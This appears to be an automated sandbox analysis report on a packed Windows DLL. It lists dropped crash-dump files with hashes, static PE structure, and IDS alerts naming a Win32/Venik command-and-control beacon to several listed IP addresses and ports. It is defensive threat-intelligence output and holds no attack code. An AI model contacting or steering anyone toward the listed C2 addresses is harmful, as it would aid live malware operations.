                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.9.2.4.0.3.8.1.9.6.8.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.9.2.4.0.4.3.1.9.7.0.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.a.c.b.d.2.7.-.5.4.5.7.-.4.3.7.6.-.8.d.d.5.-.2.6.b.8.2.a.8.9.1.7.3.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.5.f.f.4.a.a.-.9.c.e.4.-.4.6.3.8.-.b.5.f.3.-.7.c.3.6.1.6.4.3.b.6.2.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.c.4.-.0.0.0.1.-.0.0.1.4.-.e.a.7.3.-.2.7.f.5.2.2.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E53.tmp.dmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 14:33:21 2024, 0x1205a4 type
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):43452
                                                                                                                                          Entropy (8bit):2.0845666960232223
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:4sqIZINXJXXcO5H4c80h64wupxP/BC9roNWiuElMA:nZI/5HZpjT/BC9uWivM
                                                                                                                                          MD5:3BC51876FE3DD3818E5B6490D6DBDC83
                                                                                                                                          SHA1:68DCBA0B9D92868C3E543D02BA26E94547669FCF
                                                                                                                                          SHA-256:952040479E604E8418AE48591D01210E7D2C86C6F57686381F616E56AE2C2448
                                                                                                                                          SHA-512:C6520A8AC9D1B6424DF961613A5405214B799F188B4347E97A708310E6968CEAC927FA4CEC6E9CAEC27DDBBC29A43CC28D422EC5B7929D974FA974ECA88D4C50
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MDMP..a..... .........dg........................................V/..........T.......8...........T..........................L...........8...............................................................................eJ..............GenuineIntel............T.............dg.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FDA.tmp.WERInternalMetadata.xml

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):8272
                                                                                                                                          Entropy (8bit):3.6921630436836645
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:R6l7wVeJxh6Zr6Y5E6mgmfTZxprt89bzisfvRm:R6lXJH6V6Ya6mgmfTZWzhfU
                                                                                                                                          MD5:8916BBE684FB65E6A7897EF2C20F45E5
                                                                                                                                          SHA1:3032964921D169708098F0966414928E7DCB3E78
                                                                                                                                          SHA-256:49562928E2EB69FF14969E575064914EF5F066AA7CD5F0F0252DA268156B31DD
                                                                                                                                          SHA-512:91FB8E4512C0584ED91F1E96AC811EB0B48B67C3912C3B6C4455F72F81638A024DC3184DFF88C2FC9E1D9C2262FC65A8A5756B3A9C2D1869FEB46BEDE8E12370
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.8.5.2.<./.P.i.

                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER300A.tmp.xml

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4654
                                                                                                                                          Entropy (8bit):4.459364086734924
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:cvIwWl8zsMtJg77aI9bIWpW8VYbYm8M4JCdPSF8q+q8/ApGScS5d:uIjfyI7Bh7V/JUqRJ35d
                                                                                                                                          MD5:28BA515A9856E3F98D7128B14E152AF4
                                                                                                                                          SHA1:B65592BBC1643BF834C18F0784364BB646E44AE3
                                                                                                                                          SHA-256:0770CA199BC129CEBB1C3C5E6533F65B27AF5F81D5A8AC6C70E88734C8A1463F
                                                                                                                                          SHA-512:DF7D51ABF119AF4963F0818FA863530F538C5D4328AC5C8F6A00909C9BBB9E85E6940C8A75A5BB7AB2C95B8CABA518D6B08BF6F6B857794BDF0BD95519F0E532
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638256" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AA7.tmp.dmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 14:33:23 2024, 0x1205a4 type
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):42710
                                                                                                                                          Entropy (8bit):2.100327838530544
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:ycrPIZINXJX8O5H4cmrkQI+jX7DoCuqSRI:lrwZIP5HZmrkts7DPv
                                                                                                                                          MD5:6573D113291F01BB9704A60A9BE33D78
                                                                                                                                          SHA1:0ED95C2DAF165B7F071ADFAF7428BF9244B639E3
                                                                                                                                          SHA-256:28A1EE93DF7272DF398B5E1DC9A700CD33286E79AE87022AB153B6B743B52C19
                                                                                                                                          SHA-512:6616ACB9C4DC9AD56067EA3B8918F61FCC86A7AC0B8175D11F7F714982E478ADEEE7C2E6BBC541C0D7F2A2354AE81BAA4A8B4BC53A88A1ECF4DC86191E77A4F6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MDMP..a..... .........dg........................................V/..........T.......8...........T...............6...........L...........8...............................................................................eJ..............GenuineIntel............T.............dg.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B44.tmp.WERInternalMetadata.xml

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):8264
                                                                                                                                          Entropy (8bit):3.6958878004552824
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:R6l7wVeJZr6m6YR/6IgmfTxxprt89bBbsfgrm:R6lXJV6m6YJ6IgmfTxWBgfh
                                                                                                                                          MD5:E7880C0EA4F9F9F7F5DC94C7CEAECFA3
                                                                                                                                          SHA1:5401AD7EFF43E3D8D17BDA346AFE505B628D2CB0
                                                                                                                                          SHA-256:0606E07946A8F518B03E01DA84FD957F2F9752149FD6D8A89EEE5E053B3AA66C
                                                                                                                                          SHA-512:457E65F607EB01D5603100D53BB8CEF2501803D2FCC4A11D6A1B884033E68B074C0AE7322DDCDD46DDD2F1DCB5422B55FC43578B66B1C7A8DD412B62BB4CADA5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.8.0.<./.P.i.

                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B64.tmp.xml

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4654
                                                                                                                                          Entropy (8bit):4.460469187588189
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:cvIwWl8zsMtJg77aI9bIWpW8VY0Ym8M4JCdPOFIA+q8/AoT4GScSEd:uIjfyI7Bh7V4JkAAcJ3Ed
                                                                                                                                          MD5:587D70F6CBC75AA7D4770610CF9C25D8
                                                                                                                                          SHA1:6060E86CE29B69B246B9104F89BB5ECF1792DD3C
                                                                                                                                          SHA-256:2E0477343406CDC566A635518C6EB555371A872BA707B9CCA20EF29DE66FF564
                                                                                                                                          SHA-512:711EF54659BF97144684A493080C1A42A34964CD57D81ED5C7E39087304E7F3CB1B6CACD7E48C6FAC402EE4981F5908879E532AE7650C8BFD734318F67BD2387
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638256" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):328
                                                                                                                                          Entropy (8bit):3.548225307988918
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:kKaB3hK8ZsTwD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:accImsLNkPlE99SNxAhUe/3
                                                                                                                                          MD5:DAD428D83DA7E628B70EF65FE757B78C
                                                                                                                                          SHA1:B99C78E7AB2073CD7F05DAAC0CF550F76459B5E0
                                                                                                                                          SHA-256:78F485513A1D3EE82C40C17062D60B9C6C02F5A3602B27D2EEAC726C2897186C
                                                                                                                                          SHA-512:4E2F495BE7BE5083E82BC114F239925A3298D46B08D7C15B77DC64DF553A7AB1BCA11BE7BFD1D2AE1CFBA9F4631B0B892BDCA601BF9D507455CA9EC51C35DC94
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:p...... ......../I.$....(...............................................Z g..W.. ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1835008
                                                                                                                                          Entropy (8bit):4.422271246554642
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:9Svfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnNP0uhiTw:kvloTyW+EZMM6DFyl03w
                                                                                                                                          MD5:ECECCBF1A19603FFD20D993D0CC20CD1
                                                                                                                                          SHA1:86B9F67643EF5021125424122AA9219277E7E730
                                                                                                                                          SHA-256:4CAB442ABDF36B5D4432DD50A911052A00CA1D6FFAC016A60F10A3C936185227
                                                                                                                                          SHA-512:5596E3EAE13F17B6C839A29F5B82538081F336ED88525C16BD91E3ED0E97BB5AC9B40165AAEFB34319CBFA3B69E623EE1407CC0D329487C1B0B42F2D3055F539
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.B.."R..............................................................................................................................................................................................................................................................................................................................................6..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows, PECompact2 compressed
                                                                                                                                          Entropy (8bit):6.394027469387996
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                          File name:QCTYoyX422.dll
                                                                                                                                          File size:322'775 bytes
                                                                                                                                          MD5:d32fca080e7b321914810ff69eafd1a4
                                                                                                                                          SHA1:78131997ac3542a3ce1c2ae4afac1474ba0a19cb
                                                                                                                                          SHA256:2281a8837520789fed9c41a66d241a8cf85b83085da2b0fe0f8408e49bde8cef
                                                                                                                                          SHA512:aa768dae6eb1191f7bb420a2041c70edae6ef679f11f91924fa5b5f96cf945b823f20744db5cc1be9ca951c0a8059a6b5aeba067bc995bfe67cf13a5db93ab53
                                                                                                                                          SSDEEP:6144:YutK09bpsWYrPnP3UKLSr1TS8BbdrFucR+z+qagIK+bcgaI0M:BK0YWYrPP35LSrBS8LQ4+z+qagQYVIZ
                                                                                                                                          TLSH:3964AE0237B552F5D4F70A3A9F35E72DE33438109CA8DD159B8A08C91CE3949AED578B
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... B..N...N...N...B...N.F.....N.......N.......N.......N...@...N.m.D...N...O.^.N.m.E...N.=.H...N.m.J...N.Rich..N................

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:7ae282899bbab082

                                                                                                                                          Static PE Info

                                                                                                                                          General

                                                                                                                                          Entrypoint:0x10042ae6
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x10000000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
                                                                                                                                          DLL Characteristics:
                                                                                                                                          Time Stamp:0x565C7C9C [Mon Nov 30 16:43:08 2015 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:4
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:4
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:4
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:1e14d607956b4cc2b9b7835c72bf0b77

                                                                                                                                          Entrypoint Preview

                                                                                                                                          Instruction
                                                                                                                                          jmp 00007FCB388165EEh
                                                                                                                                          adc byte ptr [ebp+6E3FA254h], al
                                                                                                                                          or eax, dword ptr [esi]
                                                                                                                                          mov cl, 92h

                                                                                                                                          Rich Headers

                                                                                                                                          Programming Language:
                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                          • [ C ] VS98 (6.0) build 8168
                                                                                                                                          • [C++] VS98 (6.0) build 8168
                                                                                                                                          • [RES] VS98 (6.0) cvtres build 1720
                                                                                                                                          • [LNK] VS98 (6.0) imp/exp build 8168

                                                                                                                                          Data Directories

                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x4fb240x68.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3d6cc0x118.text
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x4f0000xb10.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x490000x1628.text
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                          Sections

                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          .text0x10000x4e0000x4ca00b29859f73b90e7f64037da48fbee12a8False0.5888783391109299data6.394873960706557IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .rsrc0x4f0000x20000x1e00a03763a40a39da37762a5efcd57a5136False0.6859375data6.354524003809639IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .reloc0x510000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                          Resources

                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                          RT_STRING0x4b0000x16cdataEnglishUnited States0.5521978021978022
                                                                                                                                          RT_STRING0x4b1700x86dataEnglishUnited States0.6417910447761194
                                                                                                                                          RT_STRING0x4b1f80x56dataEnglishUnited States0.6744186046511628
                                                                                                                                          RT_STRING0x4b2500x16edataEnglishUnited States0.505464480874317
                                                                                                                                          RT_STRING0x4b3c00x128dataEnglishUnited States0.581081081081081
                                                                                                                                          RT_STRING0x4b4e80xd2dataEnglishUnited States0.5761904761904761
                                                                                                                                          RT_STRING0x4b5c00x6adataEnglishUnited States0.660377358490566
                                                                                                                                          RT_STRING0x4b6300xc8Matlab v4 mat-file (little endian) b, numeric, rows 0, columns 0EnglishUnited States0.555
                                                                                                                                          RT_STRING0x4b6f80x200dataEnglishUnited States0.375
                                                                                                                                          RT_STRING0x4b8f80x23edataEnglishUnited States0.44773519163763065
                                                                                                                                          RT_STRING0x4bb380x12edataEnglishUnited States0.4503311258278146
                                                                                                                                          RT_STRING0x4bc680xcaMatlab v4 mat-file (little endian) O, numeric, rows 0, columns 0EnglishUnited States0.42574257425742573
                                                                                                                                          RT_STRING0x4bd380x252dataEnglishUnited States0.39225589225589225
                                                                                                                                          RT_STRING0x4bf900x28edataEnglishUnited States0.43730886850152906
                                                                                                                                          RT_STRING0x4c2200xcedataEnglishUnited States0.4563106796116505
                                                                                                                                          RT_STRING0x4c2f00x15cMatlab v4 mat-file (little endian) a, numeric, rows 0, columns 0EnglishUnited States0.4166666666666667
                                                                                                                                          RT_STRING0x4c4500x398dataEnglishUnited States0.375
                                                                                                                                          RT_STRING0x4c7e80x2aedataEnglishUnited States0.3688046647230321
                                                                                                                                          RT_STRING0x4ca980x42dataEnglishUnited States0.4696969696969697
                                                                                                                                          RT_STRING0x4cae00x20dataEnglishUnited States0.34375
                                                                                                                                          RT_STRING0x4cb000x20dataEnglishUnited States0.34375
                                                                                                                                          RT_STRING0x4cb200x20dataEnglishUnited States0.34375
                                                                                                                                          RT_STRING0x4cb400x20dataEnglishUnited States0.34375
                                                                                                                                          RT_STRING0x4cb600x20dataEnglishUnited States0.34375
                                                                                                                                          RT_STRING0x4cb800x20dataEnglishUnited States0.34375
                                                                                                                                          RT_STRING0x4cba00x20dataEnglishUnited States0.34375
                                                                                                                                          RT_STRING0x4cbc00x20dataEnglishUnited States0.34375
                                                                                                                                          RT_STRING0x4cbe00x7adataEnglishUnited States0.6475409836065574
                                                                                                                                          RT_STRING0x4cc600x20dataEnglishUnited States0.34375
                                                                                                                                          RT_STRING0x4cc800x20dataEnglishUnited States0.34375
                                                                                                                                          RT_STRING0x4cca00x13aMatlab v4 mat-file (little endian) ', numeric, rows 0, columns 0EnglishUnited States0.3821656050955414
                                                                                                                                          RT_STRING0x4cde00x19adataEnglishUnited States0.4195121951219512
                                                                                                                                          RT_STRING0x4cf800x9adataEnglishUnited States0.512987012987013
                                                                                                                                          RT_STRING0x4d0200xa8dataEnglishUnited States0.5833333333333334
                                                                                                                                          RT_STRING0x4d0c80x20dataEnglishUnited States0.34375
                                                                                                                                          RT_VERSION0x4f7f00x31cdataEnglishUnited States0.4296482412060301
                                                                                                                                          RT_HTML0x4d0e80x49HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8493150684931506
                                                                                                                                          RT_HTML0x4d1380xdHTML document, ASCII text, with no line terminatorsEnglishUnited States1.3076923076923077
                                                                                                                                          RT_HTML0x4d1480x6beHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5179606025492468

                                                                                                                                          Imports

                                                                                                                                          DLLImport
                                                                                                                                          MFC42.DLL
                                                                                                                                          MSVCRT.dll_strcmpi
                                                                                                                                          KERNEL32.dllCreateDirectoryA
                                                                                                                                          USER32.dllGetDesktopWindow
                                                                                                                                          ADVAPI32.dllRegDeleteValueA
                                                                                                                                          WS2_32.dllhtons
                                                                                                                                          SHLWAPI.dllPathIsDirectoryA
                                                                                                                                          ole32.dllCoUninitialize
                                                                                                                                          OLEAUT32.dllSafeArrayGetVartype
                                                                                                                                          MSVCP60.dll?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z
                                                                                                                                          NETAPI32.dllNetbios
                                                                                                                                          KERNEL32.dllGetModuleFileNameW
                                                                                                                                          KERNEL32.dllGetModuleHandleA, LoadLibraryA, LocalAlloc, LocalFree, GetModuleFileNameA, ExitProcess

                                                                                                                                          Exports

                                                                                                                                          NameOrdinalAddress
                                                                                                                                          DoAddToFavDlg10x10008645
                                                                                                                                          InputFile20x1000678b
                                                                                                                                          PrintFile30x1000443d

                                                                                                                                          Possible Origin

                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                          EnglishUnited States

                                                                                                                                          Network Behavior

                                                                                                                                          Suricata IDS Alerts

                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                          2024-12-19T15:33:39.327074+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549718107.160.131.25318659TCP
                                                                                                                                          2024-12-19T15:33:39.327074+01002812407ETPRO MALWARE Win32/Venik HTTP CnC Beacon1192.168.2.549718107.160.131.25318659TCP
                                                                                                                                          2024-12-19T15:33:45.397452+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549719107.163.56.11018530TCP
                                                                                                                                          2024-12-19T15:33:45.397574+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549792107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:33:45.397604+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549794107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:33:49.117775+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549832116.133.8.9280TCP
